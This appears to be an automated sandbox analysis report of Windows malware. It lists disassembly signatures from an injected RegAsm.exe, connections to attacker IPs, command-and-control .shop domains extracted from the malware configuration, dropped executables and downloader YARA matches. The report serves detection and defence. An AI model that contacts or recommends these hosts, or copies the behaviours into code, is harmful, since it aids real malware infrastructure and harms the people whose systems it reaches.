Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi]	21_2_00415390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc ebx	21_2_00421670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	21_2_0043B800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	21_2_00435ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	21_2_00409D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	21_2_0043AE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc ebx	21_2_00414F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 18DC7455h	21_2_00421F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	21_2_0041403B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then test edi, edi	21_2_0043A0D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	21_2_00432140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+18h]	21_2_0041D128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+000001C0h]	21_2_00424240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	21_2_00415216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	21_2_0043822F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	21_2_0040D2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	21_2_0041B2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	21_2_00439461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+0Ch]	21_2_0043B470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000F0h]	21_2_0041347E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	21_2_004384D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	21_2_004025E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	21_2_00416582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc ebx	21_2_004216CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then not ecx	21_2_004176E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h	21_2_00413722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000180h]	21_2_00411739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	21_2_0040F7CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	21_2_0041B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	21_2_0043799B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	21_2_00416A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+70h]	21_2_00417A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	21_2_00422B54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	21_2_00422B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	21_2_00417BF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000008A0h]	21_2_0041FBB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+00000600h], 00000000h	21_2_00410C5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	21_2_00416E69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push edi	21_2_0040FED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+00000600h], 00000000h	21_2_00410F4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000008A0h]	21_2_0041EF19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi]	29_2_004381B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	29_2_004162C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+10h]	29_2_00409BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc edi	29_2_00402CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea esi, dword ptr [edx+ecx]	29_2_0041EFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	29_2_0042404C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push 00000000h	29_2_00411007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	29_2_00424038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esi+10h]	29_2_004210E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [esp]	29_2_004110A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	29_2_004231D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc ecx	29_2_00414190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	29_2_004171A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp+000000BCh]	29_2_0041B230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	29_2_004122E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	29_2_004232E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	29_2_00422355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	29_2_00422355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	29_2_004183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	29_2_0042E3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	29_2_004223FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000080h]	29_2_00423381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	29_2_00414397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [esi]	29_2_0042342A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	29_2_00422328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [eax-08h], 18DC7455h	29_2_00432600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	29_2_00402620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	29_2_0041D634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+74h]	29_2_004206F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	29_2_004206F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	29_2_004226A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	29_2_004226A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh	29_2_0041B6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	29_2_00421768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+08h], edx	29_2_0041D878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	29_2_00421FEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [edi+04h]	29_2_0041F94E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	29_2_004149A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [esi+000000D4h]	29_2_00420A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esp+eax+000000A0h], 0000h	29_2_00433A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc ebx	29_2_0041DBCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esp+eax+000000A0h], 0000h	29_2_00433A95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	29_2_00419E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	29_2_0040DF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	29_2_0041FFD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	29_2_00421FF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	29_2_00423FF3

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.32 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wifeplasterbakewis.shop
Source: Malware configuration extractor	URLs: mealplayerpreceodsju.shop
Source: Malware configuration extractor	URLs: bordersoarmanusjuw.shop
Source: Malware configuration extractor	URLs: suitcaseacanehalk.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: pushjellysingeywus.shop
Source: Malware configuration extractor	URLs: economicscreateojsu.shop
Source: Malware configuration extractor	URLs: entitlementappwo.shop
Source: Malware configuration extractor	IPs: 185.172.128.19
Source: Malware configuration extractor	URLs: 185.172.128.33:8970

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: vFvvln76msVyiTRvQQMSlc4y.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: 6A6tSzDSK6P9F6s9kkiOZkgA.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: a3XC8JYF0aYXxIZPljcBh92I.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: 0ZzXdtKbBOkMTYdVV1HNUsqT.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: xIvgySaF2JVAOfOVBY400p1d.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: gxNMHUmIRRsTpoh2kGfIr9lW.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: IA1JiyWIGEvHCZKTDOlZNrXb.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: YtkUkgpbmZlbSuZT81owPAOw.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: yybBRlcB659iEk7Vesfqc6Zw.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: SlwT2Dhb0jcRK2apeSa3FdHE.exe.45.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: swXqwxxcUE7SVCRYdUBHf3nm.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: IKulK0lzJvII432wpHMkGWRw.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: domCqD7LBg1Q0KxGLvuFe0Aj.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: uWDQa01moDg0YUv8UXTjuXuR.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: dkk7cRVuWpprbxEbDlw69GrM.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: h9MmfvkW2XknV10h725GOqVL.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: UvmCGtz1aYTjhcoAhykwCuQw.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: CCF32f9je00j8IZrr0Ff4c4t.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: EqvNTTWJsgdaHBZM2vNGyoMV.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: 0zuHPkqadZGFhsedqfFjHrEV.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: oxW5doxruDrLfkxekfdC42S3.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: RvrkjxBwedY81Y68Ne47TzMs.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: Stj0rnzdLizcr79amRyA4wnp.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: 1Cki827fF40ubJ4RMKyP3Elr.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: 33tIGBzVuCMQl3Wc6IvtNEjP.exe.51.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: v05bbHszTdSghZlrnH5jWCvs.exe.51.dr

Yara detected Generic Downloader

Source: Yara match	File source: 39.2.file300un.exe.27ab92961f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.Uni400uni.exe.25500086af8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.Uni400uni.exe.255000840b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.file300un.exe.27ab92937b8.2.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

IP Address: 185.172.128.90 185.172.128.90

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Code function: 0_2_008CC990 recv,recv,recv,recv,

0_2_008CC990

Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: c. Facebook Messenger: A messaging service provided by Facebook, Inc., Meta Platforms Ireland Ltd. or related companies, depending on where you are accessing their services. Terms of use are available at https://www.facebook.com/legal/terms; and equals www.facebook.com (Facebook)
Source: Traffic.exe, 0000000F.00000002.2321334601.0000000002686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: #www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: Traffic.exe, 0000000F.00000002.2321334601.0000000002686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: Traffic.exe, 0000000F.00000002.2321334601.0000000002686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net
Source: svchost.exe, 00000013.00000003.2285131926.0000025E535F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://localhost:3001api/prefs/?product=$1&version=$2..
Source: powershell.exe, 00000008.00000002.2542158333.000001A31C51F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C4B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DD30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ISetup8.exe, 00000023.00000003.3016446842.0000000005C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: ISetup8.exe, 00000023.00000003.3016446842.000000000585C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: http://www.opera.com0
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://addons.opera.com/en/extensions/details/dify-cashback/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.com
Source: RegAsm.exe, 0000001D.00000002.2663231938.0000000001348000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.3031292972.000000000357A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2648072968.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://affordcharmcropwo.shop/
Source: RegAsm.exe, 0000001D.00000002.2670127283.0000000001375000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://affordcharmcropwo.shop/api
Source: RegAsm.exe, 0000001D.00000002.3031292972.0000000003570000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://affordcharmcropwo.shop/apiA
Source: RegAsm.exe, 0000001D.00000002.3031292972.000000000357A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://affordcharmcropwo.shop/apiW
Source: RegAsm.exe, 0000001D.00000002.2648072968.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://affordcharmcropwo.shop:443/api
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C4B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2329069895.000001A30C6D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30DAD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2329069895.000001A30D9F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000008.00000002.2329069895.000001A30DAD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: Traffic.exe, 0000000F.00000002.2321334601.0000000002648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: alexxxxxxxx.exe, 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, propro.exe, 0000000E.00000000.2242693260.0000000000A22000.00000002.00000001.01000000.0000000D.sdmp, Traffic.exe, 0000000F.00000002.2321334601.0000000002648000.00000004.00000800.00020000.00000000.sdmp, jok.exe, 0000002F.00000000.2550237363.00000000006A1000.00000002.00000001.01000000.00000021.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://autoupdate.geo.opera.com/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://autoupdate.geo.opera.com/geolocation/
Source: l9eBjdHLCrnnkZZKJdDffPtE.exe.45.dr	String found in binary or memory: https://autoupdate.geo.opera.com/https://autoupdate.geo.opera.com/geolocation/OperaDesktophttps://cr
Source: powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2329069895.000001A30DD83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
